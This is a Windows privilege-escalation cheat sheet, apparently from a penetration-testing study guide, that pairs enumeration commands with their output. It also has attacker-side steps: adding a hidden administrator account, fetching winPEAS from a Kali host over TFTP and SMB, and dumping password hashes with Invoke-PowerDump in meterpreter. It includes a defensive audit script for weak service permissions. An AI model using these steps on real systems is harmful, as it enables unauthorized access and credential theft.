Windows privilege escalation
In the Windows environment, escalating privileges requires collecting various pieces of information about the target system. Unfortunately, Windows is not as convenient as Linux, especially when it comes to the terminal and obtaining information from a shell. Everything in Windows seems twisted and intentionally complex, and you have to remember a lot of tools and commands just to grab basic information about the system.
Below I have listed some of the commands that should help.
INFORMATION COLLECTION#
running user#
What is my account name?
C:\Users>whoami
svcorp\alice
Which groups am I in?
C:\Users\Public>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Note that BUILTIN\Administrators is marked "Group used for deny only" and the integrity level is Medium: the account is a member of Administrators, but this shell is running with a UAC-filtered token, not an elevated one.
system information#
C:\Users>systeminfo
Host Name: SVCLIENT08
OS Name: Microsoft Windows 10 Pro N
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00331-60000-00000-AA584
Original Install Date: 04/03/2019, 13:27:02
System Boot Time: 25/11/2020, 14:29:01
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
<SNIP>
operating system edition#
type C:\Windows\system32\eula.txt
NET COMMAND#
create user#
To add a user to the system and put it in the local Administrators group:
net user saitama P@ssw0rd196 /ADD
net localgroup administrators saitama /add
view all users#
net users
view domain groups#
C:\Windows>net group /domain
The request will be processed at a domain controller for domain svcorp.com.
Group Accounts for \\sv-dc01.svcorp.com
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*Company_Mail
...
view services#
It is also possible to view all the running services using the net command; the details are shown in the services section.
net start
TRANSFER FILE#
tftp#
Start the TFTP service on the Kali machine by running:
$ sudo service atftpd start
When the service is up and running, pull the file from the TFTP server with the following command.
C:\>tftp -i 192.168.119.178 GET winPEASx86.exe winPEASx86.exe
Note that the files are served from the /srv/tftpd directory.
smb#
It is possible to share a folder over SMB from the Kali machine and mount that share on the victim box.
net use m: \\192.168.119.178\folder1 /user:kali kali
When the work is done, remove the mapping with the following command.
net use m: /delete
ALWAYS INSTALL ELEVATED#
The policy only takes effect when the value is set to 1 under both keys; check both.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
SERVICE#
Enum information of all the services#
This shows detailed information for all services on the system. The command works on XP SP1.
C:\>sc queryex type= service
SERVICE_NAME: ALG
DISPLAY_NAME: Application Layer Gateway Service
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 964
FLAGS :
<SNIP>
All the running services can also be obtained using tasklist.
C:\>tasklist /SVC
Image Name PID Services
========================= ====== =============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 360 N/A
csrss.exe 408 N/A
winlogon.exe 432 N/A
services.exe 476 Eventlog, PlugPlay
lsass.exe 488 SamSs
svchost.exe 664 RpcSs
svchost.exe 712 AudioSrv, Browser, CryptSvc, dmserver,
EventSystem, lanmanserver,
lanmanworkstation, Messenger, Netman, Nla,
RasMan, Schedule, seclogon, SENS,
SharedAccess, ShellHWDetection, TapiSrv,
TermService, Themes, TrkWks, uploadmgr,
winmgmt
svchost.exe 760 Dnscache
svchost.exe 772 LmHosts, RemoteRegistry, WebClient
alg.exe 964 ALG
snmp.exe 1028 SNMP
VGAuthService.exe 1052 VGAuthService
To view the running processes in the system.
C:\>tasklist
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 0 20 K
System 4 0 216 K
smss.exe 360 0 344 K
csrss.exe 408 0 1,864 K
winlogon.exe 432 0 40,668 K
services.exe 476 0 10,024 K
lsass.exe 488 0 4,520 K
svchost.exe 664 0 3,064 K
svchost.exe 712 0 22,688 K
C:\> net start
These Windows services are started:
Application Layer Gateway Service
COM+ Event System
COM+ System Application
Computer Browser
Cryptographic Services
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Event Log
FTP Publishing
IIS Admin
Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)
Logical Disk Manager
Messenger
Network Connections
Network Location Awareness (NLA)
Plug and Play
Remote Access Connection Manager
To list all the drivers loaded in the system:
C:\>DRIVERQUERY
Module Name Display Name Driver Type Link Date
============ ====================== ============= ======================
ACPI Microsoft ACPI Driver Kernel 8/29/2002 9:09:03 AM
ACPIEC ACPIEC Kernel 8/17/2001 9:57:55 PM
AFD AFD Networking Support Kernel 8/17/2011 2:49:53 PM
agp440 Intel AGP Bus Filter Kernel 8/17/2001 9:57:59 PM
AsyncMac RAS Asynchronous Media Kernel 8/17/2001 9:55:29 PM
atapi Standard IDE/ESDI Hard Kernel 8/29/2002 9:27:48 AM
Atmarpc ATM ARP Client Protoco Kernel 8/17/2001 9:46:40 PM
audstub Audio Stub Driver Kernel 8/17/2001 9:59:40 PM
Beep Beep Kernel 8/17/2001 9:47:33 PM
cbidf2k cbidf2k Kernel 8/17/2001 9:52:06 PM
Cdaudio Cdaudio Kernel 8/17/2001 9:52:26 PM
Cdfs Cdfs File System 8/29/2002 9:58:50 AM
Cdrom CD-ROM Driver Kernel 8/29/2002 9:27:55 AM
CmBatt Microsoft AC Adapter D Kernel 8/29/2002 9:09:04 AM
Compbatt Microsoft Composite Ba Kernel 8/17/2001 9:57:58 PM
Disk Disk Driver Kernel 8/29/2002 9:27:56 AM
To list installed software. This command might not work if the user does not have sufficient permission to run wmic.
wmic product get name, version, vendor
using PowerShell#
Get-Service
service details#
To obtain detailed information of a specific service:
C:\>sc query uploadmgr
SERVICE_NAME: uploadmgr
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
Detailed service configuration:
C:\>sc qc uploadmgr
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: uploadmgr
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINDOWS\System32\svchost.exe -k netsvcs
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Upload Manager
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
Here, the binary path should show the exact location the service executable runs from, but in this case it does not: the service is hosted inside a shared svchost.exe process (-k netsvcs), so the path points at svchost rather than at a service-specific binary.
script to check for permissions#
First go to a location where you have write permission and run the following command. It writes the binary path of every service outside system32 to permissions.txt.
We are interested in services where the permissions for our group, BUILTIN\Users, are (F), (C) or (M). More info about permissions:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> permissions.txt
Then run the following command, which uses icacls to view the permissions on each service binary.
for /f eol^=^"^ delims^=^" %a in (permissions.txt) do cmd.exe /c icacls "%a"
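As an added audit script (not from the original notes), the following PowerShell performs the same check as the two for loops above in one pass: it resolves each service's executable from its PathName the way the service control manager does, flags binaries that BUILTIN\Users, Everyone, Authenticated Users or INTERACTIVE can modify, and also flags unquoted paths containing spaces. The principal list and the set of rights treated as "writable" are my assumptions.

```powershell
# Added audit script (not from the original notes): lists services whose binary lives outside
# system32 and is writable by a low-privileged principal, or sits on an unquoted path with spaces.
# Run in an elevated PowerShell on the host being audited. Principal list is an assumption.
$fsr = [System.Security.AccessControl.FileSystemRights]
$weakPrincipals = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Rights that let a principal replace the file or rewrite its ACL; icacls F, M and W all include some of these.
$writeBits = [int]($fsr::WriteData -bor $fsr::AppendData -bor $fsr::Delete -bor $fsr::ChangePermissions -bor $fsr::TakeOwnership)

function Get-ServiceExecutable([string]$PathName) {
    # Quoted path: the executable is whatever sits inside the first pair of quotes.
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    # Unquoted path: the service control manager tries each space-delimited prefix in turn,
    # so resolve it the same way and take the first candidate that exists on disk.
    $parts = $PathName.Trim() -split ' '
    for ($i = 1; $i -le $parts.Count; $i++) {
        $candidate = $parts[0..($i - 1)] -join ' '
        foreach ($p in @($candidate, "$candidate.exe")) {
            if (Test-Path -LiteralPath $p -PathType Leaf) { return $p }
        }
    }
    return $null
}

function Find-WeakServiceBinaries {
    Get-CimInstance Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '\\system32\\' } |
        ForEach-Object {
            $svc = $_
            $exe = Get-ServiceExecutable $svc.PathName
            if (-not $exe) { Write-Warning "$($svc.Name): cannot resolve '$($svc.PathName)'"; return }
            $unquoted = ($svc.PathName -notmatch '^\s*"') -and ($exe -match ' ')
            $acl = Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue
            $weakAces = @($acl.Access | Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                $weakPrincipals -contains $_.IdentityReference.Value -and
                (([int]$_.FileSystemRights) -band $writeBits) -ne 0
            })
            if ($weakAces.Count -gt 0 -or $unquoted) {
                [pscustomobject]@{
                    Service  = $svc.Name
                    RunsAs   = $svc.StartName
                    Binary   = $exe
                    Unquoted = $unquoted
                    WeakACEs = ($weakAces | ForEach-Object { "$($_.IdentityReference) [$($_.FileSystemRights)]" }) -join '; '
                }
            }
        }
}

Find-WeakServiceBinaries | Format-Table -AutoSize
```

Each row is a service to fix: tighten the binary's ACL to administrators and SYSTEM, or quote the ImagePath, and give priority to services whose RunsAs is LocalSystem.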
PowerShell#
msf PowerDump.ps1#
Use the following commands to import the PowerDump script and execute it.
meterpreter > powershell_import /home/kali/Desktop/wintools/Invoke-PowerDump.ps1
meterpreter > powershell_execute Invoke-PowerDump
SCHEDULED TASKS#
all tasks - verbose#
The following command dumps all scheduled tasks on the system. The output of the verbose form can be overwhelming.
schtasks /query /fo LIST /v
schtasks /query /fo LIST
DRIVERS#
Installed Drivers#
Run this from PowerShell, since it relies on ConvertFrom-CSV and Select-Object to pick columns from the driverquery output.
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
View Driver Version#
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*udfs*"}
PS - View Driver Version#
Get-WmiObject Win32_PnPSignedDriver| select DeviceName, DriverVersion, Manufacturer
AUTO ELEVATE#
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
reference#
- Following exploits hands on (Services with Vulnerable Privileges etc.); need to study (link)
- some good list of how to escalate priv in windows (link)
- how to grab a file from the attacker workstation (link)
- accesschk.exe for windows xp (link)
- a very good list of what to do post exploitation (link)
- good guide (link)
- windows exploits and versions, mostly for HTB but should work too (link)
- already compiled exploits ready to download and run (link)
- looking for this one? (link)
- priv esc using unquoted service paths (link)
unsorted references#
- https://0x1.gitlab.io/exploit/Windows-Privilege-Escalation/
- http://www.fuzzysecurity.com/tutorials/16.html
- https://sushant747.gitbooks.io/total-oscp-guide/content/cmd.html
- https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
- https://blog.adithyanak.com/oscp-preparation-guide
- https://thor-sec.com/review/oscp/oscp_review/
- https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md
- http://0xc0ffee.io/blog/OSCP-Goldmine
- https://guif.re/windowseop